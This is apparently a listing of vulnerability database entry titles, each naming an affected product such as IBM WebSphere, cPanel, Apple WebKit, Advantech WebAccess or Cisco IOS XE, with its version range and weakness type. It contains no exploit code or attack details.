[142764] IBM WebSphere Application Server Liberty Cookie privilege escalation
[142763] IBM WebSphere Application Server Liberty Session weak authentication
[142761] IBM WebSphere eXtreme Scale 8.6 Admin API cross site scripting
[142759] IBM WebSphere eXtreme Scale 8.6 Admin Console Improper Restriction of Rendered UI Layers
[142758] IBM WebSphere eXtreme Scale 8.6 Admin Console cross site scripting
[142737] Western Digital SSD Dashboard/SanDisk SSD Dashboard up to 2.5.0 Web Service privilege escalation
[142382] D-Link DIR-655C/DIR-866L/DIR-652/DHP-1565 Common Gateway Interface privilege escalation
[142329] Honeywell Performance IP Cameras/Performance NVR Integrated Web Server information disclosure
[142318] F5 BIG-IP up to 11.6.5/12.1.5/13.1.3/14.1.2 Management Interface privilege escalation
[142313] Advantech WebAccess/HMI Designer 2.1.9.31 Exception privilege escalation
[142312] Advantech WebAccess/HMI Designer 2.1.9.31 User Mode memory corruption
[142311] Advantech WebAccess/HMI Designer 2.1.9.31 GetNICInfo+0x0000000000512918 memory corruption
[142292] Cisco IOS/IOS XE Web Framework Stored cross site scripting
[142291] Cisco IOS XE Web Framework Stored cross site scripting
[142288] Cisco IOS XE Dialer Interface Feature for ISDN weak authentication
[142280] Cisco IOS/IOS XE IOx Web Server privilege escalation
[142084] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Network Deployment information disclosure
[142063] websimon-tables Plugin up to 1.3.4 on WordPress wp-admin/tools.php cross site scripting
[141975] Advantech WebAccess up to 8.4.1 privilege escalation
[141974] Advantech WebAccess up to 8.4.1 memory corruption
[141973] Advantech WebAccess up to 8.4.1 privilege escalation
[141972] Advantech WebAccess up to 8.4.1 privilege escalation
[141932] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Log information disclosure
[141931] IBM WebSphere Application Server 0/7.0/8.0/8.5/9 directory traversal
[141930] IBM Cognos Analytics 11.0/11.1 Web UI cross site scripting
[141929] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Pollution privilege escalation
[141928] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Web UI cross site scripting
[141927] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 URL directory traversal
[141723] McAfee Web Gateway up to 7.8.2.12 Administrators Web Console Reflected cross site scripting
[141690] McAfee Web Gateway up to 7.8.2.12 Scanning Proxy privilege escalation
[141689] McAfee Web Gateway up to 7.8.2.12 Scanning Proxy privilege escalation
[141613] Microsoft Exchange Server 2016 CU12/2016 CU13/2019 CU1/2019 CU2 Outlook Web App privilege escalation
[141544] Advantech WebAccess/SCADA 8.4.1 RPC Message memory corruption
[141519] SAP NetWeaver Application Server Java Web Container privilege escalation
[141476] D-Link DIR-868L REVB/DIR-885L REVA/DIR-895L REVA SharePort Web Access folder_view.php weak authentication
[141320] IBM Business Automation Workflow Web UI cross site scripting
[141274] Cisco Webex Teams Client on Windows privilege escalation
[141266] F5 BIG-IP up to 11.6.4/12.1.4.1/13.1.2/14.0.0.4/14.1.0.5 Management Interface Memory denial of service
[141181] webp-express Plugin up to 0.14.7 on WordPress Stored cross site scripting
[141178] webp-converter-for-media Plugin up to 1.0.2 on WordPress cross site request forgery
[141171] onesignal-free-web-push-notifications Plugin up to 1.17.7 on WordPress cross site scripting
[141106] Symantec Reporter Web UI up to 10.3.2.4 Credentials information disclosure
[141100] Symantec ASG/ProxySG up to 6.5.10.14/6.6/6.7.4.1 FTP Proxy WebFTP Mode information disclosure
[141099] Symantec ASG/ProxySG up to 6.5.10.14/6.6/6.7.4.1 FTP Proxy WebFTP Mode Stored cross site scripting
[141087] 1.6.17 on WordPress Purchasing cgi-bin/webscr privilege escalation
[141062] WebTorrent up to 0.107.5 HTTP Server cross site scripting
[141061] facebook-by-weblizar Plugin up to 2.8.4 on WordPress cross site request forgery
[140844] Webmin up to 1.920 rpc.cgi privilege escalation
[140843] Webmin up to 1.930 XML Data xmlrpc.cgi XML External Entity
[140792] MikroTik RouterOS up to 6.44.5/6.44.3 Management Interface privilege escalation
[140791] Rico Printer Web Server memory corruption
[140790] Rico Printer Web Server memory corruption
[140789] Rico Printer Web Server memory corruption
[140788] Rico Printer Web Server memory corruption
[140717] Webtoffee WordPress Users 1.3.0 on WordPress WF_CustomerImpExpCsv_Exporter privilege escalation
[140680] webp-express Plugin up to 0.14.10 on WordPress information disclosure
[140569] Cisco WebEx Meetings Mobile on iOS SSL Certificate weak authentication
[140534] Cisco Integrated Management Controller Web-based Management Console privilege escalation
[140484] WebLibrarian Plugin up to 3.4.8.6 on WordPress Short Code cross site scripting
[140483] WebLibrarian Plugin up to 3.4.8.5 on WordPress Short Code cross site scripting
[140482] WebLibrarian Plugin up to 3.4.8.4 on WordPress Short Code cross site scripting
[140431] IBM Cloud Private 3.1.1/3.1.2 Web UI cross site scripting
[140428] OpenEMR up to 5.0.1 Scanned Forms Interface privilege escalation
[140427] OpenEMR up to 5.0.1 Patient File Download Interface directory traversal
[140337] Webmin 1.890 privilege escalation
[140236] Webmin up to 1.920 password_change.cgi privilege escalation
[140127] OSIsoft PI Web API cross site request forgery
[140126] OSIsoft PI Web API up to 2018 information disclosure
[140112] Squid Web Proxy up to 4.7 Access Protection cachemgr.cgi memory corruption
[140085] McAfee Web Gateway up to 7.8.2.11 X-Frame-Options privilege escalation
[140083] McAfee Web Gateway up to 7.8.2.11 IFRAME information disclosure
[140038] responsive-menu Plugin up to 3.1.3 on WordPress Admin Interface cross site request forgery
[140014] simple-fields Plugin up to 1.1 on WordPress Admin Interface cross site request forgery
[139984] TIBCO LogLogic Enterprise Virtual Appliance Web Server Persistent cross site request forgery
[139786] GCDWebServer up to 3.5.2 GCDWebUploader information disclosure
[139744] 10Web Photo Gallery plugin up to 1.5.24 on WordPress admin-ajax.php directory traversal
[139743] 10Web Photo Gallery plugin up to 1.5.22 on WordPress Stored cross site scripting
[139664] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption
[139663] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption
[139662] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption
[139661] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption
[139660] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption
[139659] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption
[139630] Wall Display Plugin up to 0.6.34 on Jenkins Web Page Reflected cross site scripting
[139627] Build Pipeline Plugin up to 1.5.8 on Jenkins Web Page Stored cross site scripting
[139538] cPanel up to 60.0.24 Alias Upload Interface cross site scripting
[139504] IBM WebSphere MQ up to 9.1 LTS Messages privilege escalation
[139486] cPanel up to 62.0.3 WebMail cross site scripting
[139467] cPanel up to 60.0.24 WHM Repair Mailbox Permissions Interface Stored cross site scripting
[139370] Advantech WebAccess HMI Designer up to 2.1.9.23 MCR File memory corruption
[139356] cPanel up to 62.0.16 WHM cPAddons showsecurity Interface cross site scripting
[139354] cPanel up to 62.0.23 WHM cPAddons Install Interface Stored cross site scripting
[139309] cPanel up to 67.9999.102 Backup Interface Archive privilege escalation
[139308] cPanel up to 67.9999.102 WHM MySQL Password Change Interfaces Stored cross site scripting
[139260] cPanel up to 68.0.26 WHM listips Interface cross site scripting
[139235] cPanel up to 70.0.22 cpaddons Vendor Interface Stored cross site scripting
[139217] cPanel up to 70.0.22 WHM cPAddons showsecurity Interface cross site scripting
[139210] cPanel up to 71.9980.36 WHM Backup Configuration Interface cross site scripting
[139208] cPanel up to 71.9980.36 WHM Save Theme Interface Stored cross site scripting
[139206] cPanel up to 71.9980.36 WHM cPAddons Installation Interface Stored cross site scripting
[139189] cPanel up to 11.53.x Webmail API privilege escalation
[139184] cPanel up to 11.54.0.3 X3 Entropy Banner Interface cross site scripting
[139183] cPanel up to 11.54.0.3 WHM Feature Manager interface Stored cross site scripting
[139181] cPanel up to 11.54.0.3 WHM PHP Configuration Editor Interface cross site scripting
[139146] cPanel up to 57.9999.53 WebMail privilege escalation
[139145] cPanel up to 57.9999.53 WebMail information disclosure
[139129] cPanel up to 73.x WHM File Restoration Interface Stored cross site scripting
[139122] cPanel up to 74.0.7 WHM Style Upload Interface cross site scripting
[139121] cPanel up to 74.0.7 Site Software Moderation Interface cross site scripting
[139120] cPanel up to 74.0.7 WHM Security Questions Interface cross site scripting
[139068] foreman-tasks up to 0.15.6 Web UI/API weak authentication
[139029] IBM WebSphere Application Server Liberty Admin Center privilege escalation
[138998] cPanel up to 82.0.1 Modify Account Interface Stored cross site scripting
[138995] cPanel up to 82.0.1 Webmail Master Template cross site scripting
[138994] cPanel up to 82.0.1 WHM Tomcat Manager Interface Stored cross site scripting
[138987] 10Web Photo Gallery plugin up to 1.5.30 on WordPress Filemanager filemanager/model.php sql injection
[138974] cPanel up to 76.0.7 MultiPHP Manager Interface Stored cross site scripting
[138718] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal cross site scripting
[138717] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138716] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138715] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138714] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138713] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138712] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138711] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138710] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138709] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138708] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138707] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138706] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138705] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138704] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138703] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138702] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138701] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138700] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138699] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption
[138698] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal cross site scripting
[138697] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal information disclosure
[138658] Apple tvOS up to 12.3 WebKit memory corruption
[138657] Apple tvOS up to 12.3 WebKit memory corruption
[138656] Apple tvOS up to 12.3 WebKit memory corruption
[138655] Apple tvOS up to 12.3 WebKit memory corruption
[138654] Apple tvOS up to 12.3 WebKit memory corruption
[138653] Apple tvOS up to 12.3 WebKit memory corruption
[138652] Apple tvOS up to 12.3 WebKit memory corruption
[138651] Apple tvOS up to 12.3 WebKit memory corruption
[138650] Apple tvOS up to 12.3 WebKit memory corruption
[138649] Apple tvOS up to 12.3 WebKit memory corruption
[138648] Apple tvOS up to 12.3 WebKit memory corruption
[138647] Apple tvOS up to 12.3 WebKit memory corruption
[138646] Apple tvOS up to 12.3 WebKit memory corruption
[138645] Apple tvOS up to 12.3 WebKit memory corruption
[138644] Apple tvOS up to 12.3 WebKit memory corruption
[138643] Apple tvOS up to 12.3 WebKit memory corruption
[138642] Apple tvOS up to 12.3 WebKit memory corruption
[138641] Apple tvOS up to 12.3 WebKit memory corruption
[138640] Apple tvOS up to 12.3 WebKit memory corruption
[138639] Apple tvOS up to 12.3 WebKit Universal information disclosure
[138638] Apple tvOS up to 12.3 WebKit Universal cross site scripting
[138637] Apple tvOS up to 12.3 WebKit Universal cross site scripting
[138603] Apple macOS up to 10.14.5 WebKit memory corruption
[138602] Apple macOS up to 10.14.5 WebKit memory corruption
[138601] Apple macOS up to 10.14.5 WebKit memory corruption
[138600] Apple macOS up to 10.14.5 WebKit memory corruption
[138599] Apple macOS up to 10.14.5 WebKit memory corruption
[138598] Apple macOS up to 10.14.5 WebKit memory corruption
[138597] Apple macOS up to 10.14.5 WebKit memory corruption
[138596] Apple macOS up to 10.14.5 WebKit memory corruption
[138595] Apple macOS up to 10.14.5 WebKit memory corruption
[138594] Apple macOS up to 10.14.5 WebKit memory corruption
[138593] Apple macOS up to 10.14.5 WebKit memory corruption
[138592] Apple macOS up to 10.14.5 WebKit memory corruption
[138591] Apple macOS up to 10.14.5 WebKit memory corruption
[138590] Apple macOS up to 10.14.5 WebKit memory corruption
[138589] Apple macOS up to 10.14.5 WebKit memory corruption
[138588] Apple macOS up to 10.14.5 WebKit memory corruption
[138587] Apple macOS up to 10.14.5 WebKit memory corruption
[138586] Apple macOS up to 10.14.5 WebKit memory corruption
[138585] Apple macOS up to 10.14.5 WebKit memory corruption
[138584] Apple macOS up to 10.14.5 WebKit Universal information disclosure
[138583] Apple macOS up to 10.14.5 WebKit Universal cross site scripting
[138582] Apple macOS up to 10.14.5 WebKit Universal cross site scripting
[138559] Apple watchOS up to 5.2.1 WebKit memory corruption
[138558] Apple watchOS up to 5.2.1 WebKit memory corruption
[138557] Apple watchOS up to 5.2.1 WebKit memory corruption
[138556] Apple watchOS up to 5.2.1 WebKit memory corruption
[138555] Apple watchOS up to 5.2.1 WebKit memory corruption
[138554] Apple watchOS up to 5.2.1 WebKit memory corruption
[138553] Apple watchOS up to 5.2.1 WebKit memory corruption
[138552] Apple watchOS up to 5.2.1 WebKit memory corruption
[138551] Apple watchOS up to 5.2.1 WebKit Universal information disclosure
[138449] WebAppick WooCommerce Product Feed up to 2.2.18 on WordPress Editing Theme File woo-feed-manage-list.php:63 cross site scripting
[138411] Cherokee Web Server 1.2.103 memory corruption
[138349] Alt-N MDaemon WebMail cross site request forgery
[138235] IBM QRadar SIEM 7.2/7.3 Web UI cross site scripting
[138197] Jenkins up to LTS 2.176.1/2.185 Stapler Web Framework information disclosure
[138184] IBM QRadar SIEM 7.2/7.3 Web UI cross site scripting
[138150] Oracle Agile PLM 9.3.3/9.3.4/9.3.5 Oracle WebLogic Server privilege escalation
[138027] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 TFA Collector privilege escalation
[138026] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 OpenSSL privilege escalation
[138022] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 TFA Collector cross site scripting
[138018] Oracle WebCenter Sites 12.2.1.3.0 Oracle WebLogic Server privilege escalation
[138016] Oracle Outside In Technology 8.5.4 WebLogic privilege escalation
[138015] Oracle Outside In Technology 8.5.4 WebLogic privilege escalation
[138014] Oracle Outside In Technology 8.5.4 WebLogic privilege escalation
[138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
[138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
[138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload privilege escalation
[137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload privilege escalation
[137998] Oracle WebCenter Sites 12.2.1.3.0 OpenSSL privilege escalation
[137877] Oracle Converged Application Server 5.1/7.0/7.1 WebLogic Server privilege escalation
[137849] python-engineio up to 3.8.2 Websocket cross site request forgery
[137826] Deepwoods WebLibrarian up to 3.5.2 on WordPress admin.php AllBarCodes Blind sql injection
[137818] PHP Scripts Mall Website Seller Script up to 2.0.3 user_submit.php cross site scripting
[137638] GitLab Community Edition/Enterprise Edition up to 11.3.10/11.4.7/11.5.0 Webhooks privilege escalation
[137636] GitLab Community Edition/Enterprise Edition up to 11.3.10/11.4.7/11.5.0 Web UI privilege escalation
[137588] Microsoft Exchange Server 2010 SP3/2013 CU23/2016 CU12/2016 CU13 Web Services privilege escalation
[137499] Zoom/RingCentral Client on MacOS Web Server Video privilege escalation
[137474] Quest KACE Administrator User Interface privilege escalation
[137455] D-Link Central WiFi Manager CWM(100) /web/Public/Conn.php sql injection
[137414] Squid Web Proxy up to 4.7 Web Module cachemgr.cgi cross site scripting
[137377] Cisco Web Security Appliance HTTPS Decryption privilege escalation
[137310] F5 BIG-IP AFM/BIG-IP Analytics/BIG-IP ASM up to 11.6.3.4/12.1.4/13.1.1.4/14.0.0.4/14.1.0.5 Traffic Management User Interface Reflected cross site scripting
[137309] F5 BIG-IP up to 11.6.4/12.1.4/13.1.1.4/14.0.0.4/14.1.0.5 Traffic Management User Interface Reflected cross site scripting
[137238] Moxa OnCell G3100-HSPA up to 1.4 Build 16062919 Web Application cross site request forgery
[137237] Moxa OnCell G3100-HSPA up to 1.4 Build 16062919 Web Application weak authentication
[137211] IBM Security Guardium 10.5 Web Server privilege escalation
[137136] IBM Business Automation Workflow 18.0.0.0/18.0.0.1/18.0.0.2/19.0.0.1 Web UI cross site scripting
[137066] Advantech WebAccess/SCADA up to 8.3.5 denial of service
[137065] Advantech WebAccess/SCADA 8.3.5 memory corruption
[137064] Advantech WebAccess/SCADA 8.3.5 memory corruption
[137063] Advantech WebAccess/SCADA 8.3.5 memory corruption
[137062] Advantech WebAccess/SCADA up to 8.3.5 directory traversal
[137061] Advantech WebAccess/SCADA up to 8.3.5 information disclosure
[137055] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Admin Console information disclosure
[136914] Moodle up to 3.6.3 Web Service privilege escalation
[136882] IBM Security Access Manager up to 9.0.6 Web UI cross site scripting
[136803] Cisco IOS XE Web UI cross site request forgery
[136779] Sophos XG Firewall 17.0.8 MR-8 Admin Portal /webconsole/Controller privilege escalation
[136771] Oracle Fusion Middleware 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 WebLogic Server privilege escalation
[136722] Cisco SD-WAN Solution vManage Web-based UI privilege escalation
[136695] IBM Maximo Asset Management 7.6 Web UI cross site scripting
[136656] Advantech WebAccess/SCADA 8.4.0 RPC Call memory corruption
[136640] Advantech WebAccess/SCADA 8.4.0 memory corruption
[136594] Linksys WRT1900ACS 1.0.3.187766 Webserver setup.js.localized Password privilege escalation
[136591] HP Embedded Web Server memory corruption
[136590] HP Embedded Web Server cross site request forgery
[136589] HP Embedded Web Server Stored cross site scripting
[136588] HP Embedded Web Server Reflected cross site scripting
[136581] IBM Cognos Controller 10.2.0/10.2.1/10.3.0/10.3.1/10.4.0 Web UI cross site scripting
[136530] Webmin up to 1.910 Package Updates Module update.cgi privilege escalation
[136521] IBM Connections 6.0 Web UI cross site scripting
[136439] Cisco IOS XE Web UI cross site request forgery
[136427] Undertow Web Server up to 2.0.21 Credentials privilege escalation
[136412] SAP NetWeaver Process Integration up to 7.50 PI Integration Builder Web UI information disclosure
[136410] SAP NetWeaver Process Integration up to 7.50 Web Pages information disclosure
[136250] Cesanta Mongoose Embedded Web Server Library up to 6.13 mongoose.c mg_http_free_proto_data_cgi memory corruption
[136249] Cesanta Mongoose Embedded Web Server Library up to 6.13 mongoose.c mg_http_free_proto_data_cgi memory corruption
[136248] Cesanta Mongoose Embedded Web Server Library up to 6.13 mongoose.c mg_http_get_proto_data memory corruption
[136247] Cesanta Mongoose Embedded Web Server Library up to 6.13 mongoose.c mg_http_get_proto_data memory corruption
[136246] Cesanta Mongoose Embedded Web Server Library up to 6.13 mongoose.c mg_cgi_ev_handler memory corruption
[136204] Munica Web Server 1.14 Communication privilege escalation
[136160] PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 Profile Update Page Stored cross site scripting
[135959] Fortinet FortiOS 6.0.0/6.0.1/6.0.2/6.0.3/6.0.4 SSL VPN Web Portal Reflected cross site scripting
[135957] Fortinet FortiOS up to 6.0.4 SSL VPN Web Portal Reflected cross site scripting
[135937] Fortinet FortiOS up to 6.0.4 SSL VPN Web Portal Redirect
[135936] Fortinet FortiOS up to 6.0.4 SSL VPN Web Portal Password privilege escalation
[135935] Fortinet FortiOS up to 6.0.4 SSL VPN Web Portal memory corruption
[135934] Fortinet FortiOS up to 6.0.4 SSL VPN Web Portal cross site scripting
[135933] Fortinet FortiOS up to 6.0.4 SSL VPN Web Portal directory traversal
[135806] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135805] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135804] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135803] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135802] Apple iCloud up to 7.11 on Windows WebKit information disclosure
[135801] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135800] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135799] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135798] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135797] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135796] Apple iCloud up to 7.11 on Windows WebKit privilege escalation
[135795] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135794] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135793] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135792] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135791] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135790] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135789] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135788] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135787] Apple iCloud up to 7.11 on Windows WebKit memory corruption
[135786] Apple iCloud up to 7.11 on Windows WebKit information disclosure
[135727] Synacor Zimbra Collaboration Suite/Zimbra Web Client up to 8.8.8 Patch 6/8.8.9 Briefcase Persistent cross site scripting
[135718] Horde Groupware Webmail Edition 5.2.17/5.2.22 Image Upload Horde/Form/Type.php onSubmit privilege escalation
[135701] IBM Jazz Reporting Service up to 6.0.6.1 Web UI cross site scripting
[135700] IBM Cognos Analytics 11.0/11.1.0/11.1.1 Web UI cross site scripting
[135698] IBM Tivoli Storage Productivity Center up to 5.3.0.1 Web UI cross site scripting
[135680] Auerswald COMfort 1200 IP Phone 3.4.4.1-10589 Configuration Interface memory corruption
[135679] Auerswald COMfort 1200 IP Phone 3.4.4.1-10589 FTP Upgrade Configuration Interface privilege escalation
[135674] Synacor Zimbra Collaboration Suite up to 8.8.10 Web Client cross site scripting
[135673] Fortinet FortiOS up to 6.0.4 SSL VPN Web Portal memory corruption
[135658] Webbukkit Dynmap 3.0-beta-3 MapStorageHandler.java privilege escalation
[135555] QEMU 4.0.0 hw/display/qxl.c interface_release_resource denial of service
[135551] Quest KACE Systems Management Appliance up to 9.0 Web Application kbot_service_notsoap.php Reflected cross site scripting
[135439] Western Digital PR4100 up to 2.31 cgi-bin/webfile_mgr.cgi privilege escalation
[135288] IBM BigFix Platform 9.2/9.5 User Interface 7PK Security Features
[135287] IBM BigFix Platform 9.2/9.5 Web UI cross site scripting
[135271] OPNsense/pfsense WebUI privilege escalation
[135221] IBM WebSphere Application Server 8.5/9.0 privilege escalation
[135077] Cisco NX-OS NX-API Sandbox Interface cross site scripting
[135050] Siemens SIMATIC HMI Comfort Panel Web Server cross site scripting
[135027] Siemens SIMATIC PCS 7/SIMATIC WinCC DCOM Interface privilege escalation
[134989] Apple watchOS up to 5.2.0 WebKit memory corruption
[134988] Apple watchOS up to 5.2.0 WebKit memory corruption
[134987] Apple watchOS up to 5.2.0 WebKit memory corruption
[134986] Apple watchOS up to 5.2.0 WebKit memory corruption
[134985] Apple watchOS up to 5.2.0 WebKit information disclosure
[134965] Apple tvOS up to 12.2.1 WebKit memory corruption
[134964] Apple tvOS up to 12.2.1 WebKit memory corruption
[134963] Apple tvOS up to 12.2.1 WebKit memory corruption
[134962] Apple tvOS up to 12.2.1 WebKit memory corruption
[134961] Apple tvOS up to 12.2.1 WebKit information disclosure
[134960] Apple tvOS up to 12.2.1 WebKit memory corruption
[134959] Apple tvOS up to 12.2.1 WebKit memory corruption
[134958] Apple tvOS up to 12.2.1 WebKit memory corruption
[134957] Apple tvOS up to 12.2.1 WebKit memory corruption
[134956] Apple tvOS up to 12.2.1 WebKit memory corruption
[134955] Apple tvOS up to 12.2.1 WebKit privilege escalation
[134954] Apple tvOS up to 12.2.1 WebKit memory corruption
[134953] Apple tvOS up to 12.2.1 WebKit memory corruption
[134952] Apple tvOS up to 12.2.1 WebKit memory corruption
[134951] Apple tvOS up to 12.2.1 WebKit memory corruption
[134950] Apple tvOS up to 12.2.1 WebKit memory corruption
[134949] Apple tvOS up to 12.2.1 WebKit memory corruption
[134948] Apple tvOS up to 12.2.1 WebKit memory corruption
[134947] Apple tvOS up to 12.2.1 WebKit memory corruption
[134946] Apple tvOS up to 12.2.1 WebKit memory corruption
[134945] Apple tvOS up to 12.2.1 WebKit information disclosure
[134888] Apple macOS up to 10.14.4 WebKit information disclosure
[134887] Apple macOS up to 10.14.4 WebKit memory corruption
[134886] Apple macOS up to 10.14.4 WebKit memory corruption
[134885] Apple macOS up to 10.14.4 WebKit memory corruption
[134884] Apple macOS up to 10.14.4 WebKit memory corruption
[134883] Apple macOS up to 10.14.4 WebKit information disclosure
[134882] Apple macOS up to 10.14.4 WebKit memory corruption
[134881] Apple macOS up to 10.14.4 WebKit memory corruption
[134880] Apple macOS up to 10.14.4 WebKit memory corruption
[134879] Apple macOS up to 10.14.4 WebKit memory corruption
[134878] Apple macOS up to 10.14.4 WebKit memory corruption
[134877] Apple macOS up to 10.14.4 WebKit privilege escalation
[134876] Apple macOS up to 10.14.4 WebKit memory corruption
[134875] Apple macOS up to 10.14.4 WebKit memory corruption
[134874] Apple macOS up to 10.14.4 WebKit memory corruption
[134873] Apple macOS up to 10.14.4 WebKit memory corruption
[134872] Apple macOS up to 10.14.4 WebKit memory corruption
[134871] Apple macOS up to 10.14.4 WebKit memory corruption
[134870] Apple macOS up to 10.14.4 WebKit memory corruption
[134869] Apple macOS up to 10.14.4 WebKit memory corruption
[134868] Apple macOS up to 10.14.4 WebKit memory corruption
[134664] Easy File Sharing Web Server 7.2 Topic forum.ghp memory corruption
[134580] IBM Business Automation Workflow 18.0.0.0/18.0.0.1/18.0.0.2/19.0.0.1 Web UI cross site scripting
[134361] Cisco Web Security Appliance Web Proxy Function privilege escalation
[134359] Cisco Umbrella Dashboard Web UI weak authentication
[134346] Cisco ASA/Firepower Threat Defense WebVPN Service cross site scripting
[134340] Cisco ASA/Firepower Threat Defense WebVPN Service denial of service
[134328] Cisco ASA/Firepower Threat Defense WebVPN Login denial of service
[134302] IBM Sterling B2B Integrator 6.0.0.0/6.0.0.1 Web UI cross site scripting
[134292] Rockwellautomation Armor Compact GuardLogix 5370 Web Server memory corruption
[134192] Webdorado Contact Form Plugin up to 1.13.4 on WordPress wp-admin/admin-ajax.php cross site request forgery
[134191] 10Web Form Maker Plugin up to 1.13.4 on WordPress wp-admin/admin-ajax.php cross site request forgery
[134189] IBM Jazz Reporting Service up to 6.0.6 Web UI cross site scripting
[134144] Webdorado Contact Form Builder Plugin up to 1.0.68 on WordPress wp-admin/admin-ajax.php cross site request forgery
[134070] IBM InfoSphere Information Server 11.3/11.5/11.7 Web UI cross site scripting
[134068] IBM Sterling B2B Integrator Standard Edition 6.0.0.0/6.0.0.1 Web UI cross site scripting
[134065] IBM Sterling B2B Integrator Standard Edition 6.0.0.0/6.0.0.1 Web UI cross site scripting
[134064] IBM Sterling B2B Integrator Standard Edition 6.0.0.0/6.0.0.1 Web UI cross site scripting
[134063] IBM Sterling B2B Integrator Standard Edition 6.0.0.0/6.0.0.1 Web UI cross site scripting
[134062] IBM Sterling B2B Integrator Standard Edition 6.0.0.0/6.0.0.1 Web UI cross site scripting
[134061] IBM Sterling B2B Integrator Standard Edition 6.0.0.0/6.0.0.1 Web UI cross site scripting
[134040] TIBCO ActiveMatrix BPM Administrative Web Server Credentials privilege escalation
[133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php privilege escalation
[133465] GitLab Community/Enterprise up to 11.6.9/11.7.5/11.8.0 User Interface 7PK Security Features
[133451] Siemens CP1604 Webserver privilege escalation
[133414] IBM BigFix WebUI Profile Management Back-End Database sql injection
[133332] MikroTik RouterOS up to 6.43.12 Interfaces directory traversal
[133321] SAP Crystal Reports for Visual Studio .NET SDK WebForm Viewer Credentials information disclosure
[133318] SAP NetWeaver Process Integration Web Page information disclosure
[133313] Juniper Junos Management Interface privilege escalation
[133307] Juniper Junos Management Interface Buffer denial of service
[133303] Juniper Junos Telemetry Interface privilege escalation
[133295] PRTG up to 19.1.49 WebGUI cross site scripting
[133265] Advantech WebAccess 8.3.4 privilege escalation
[133264] Advantech WebAccess 8.3.4 File Upload privilege escalation
[133224] Microsoft Exchange Server 2013 CU22/2016 CU11/2016 CU12/2019/2019 CU1 Outlook Web Access privilege escalation
[133198] Microsoft Exchange Server up to 2019 CU1 Outlook Web Access Data Processing Error
[133173] Microsoft Windows up to Server 2019 IOleCvt Interface privilege escalation
[133082] Trend Micro InterScan Web Security Virtual Appliance 6.5 SP2 Credentials privilege escalation
[133080] Advantech WebAccess SCADA up to 8.3.5 Access Control privilege escalation
[133079] Advantech WebAccess SCADA up to 8.3.5 privilege escalation
[133078] Advantech WebAccess SCADA up to 8.3.5 memory corruption
[132714] IBM WebSphere Application Server 7.5/8.0/8.5/9.0 Admin Console denial of service
[132684] Grandstream GXP16xx VoIP 1.0.4.128 SSH Configuration Interface privilege escalation
[132579] Ucweb UC Browser up to 2019-03-26 on Android PDF Module Download weak encryption
[132539] Cisco IOS XE Gigabit Ethernet Management Interface privilege escalation
[132535] Cisco IOS XE Web Services Management Agent privilege escalation
[132533] Cisco IOS XE Web UI privilege escalation
[132524] Cisco IOS XE Web UI Framework privilege escalation
[132523] Cisco IOS XE Web UI privilege escalation
[132498] Rockwell Automation EtherNet-IP Web Server Module 1756-EWEB SNMP Service privilege escalation
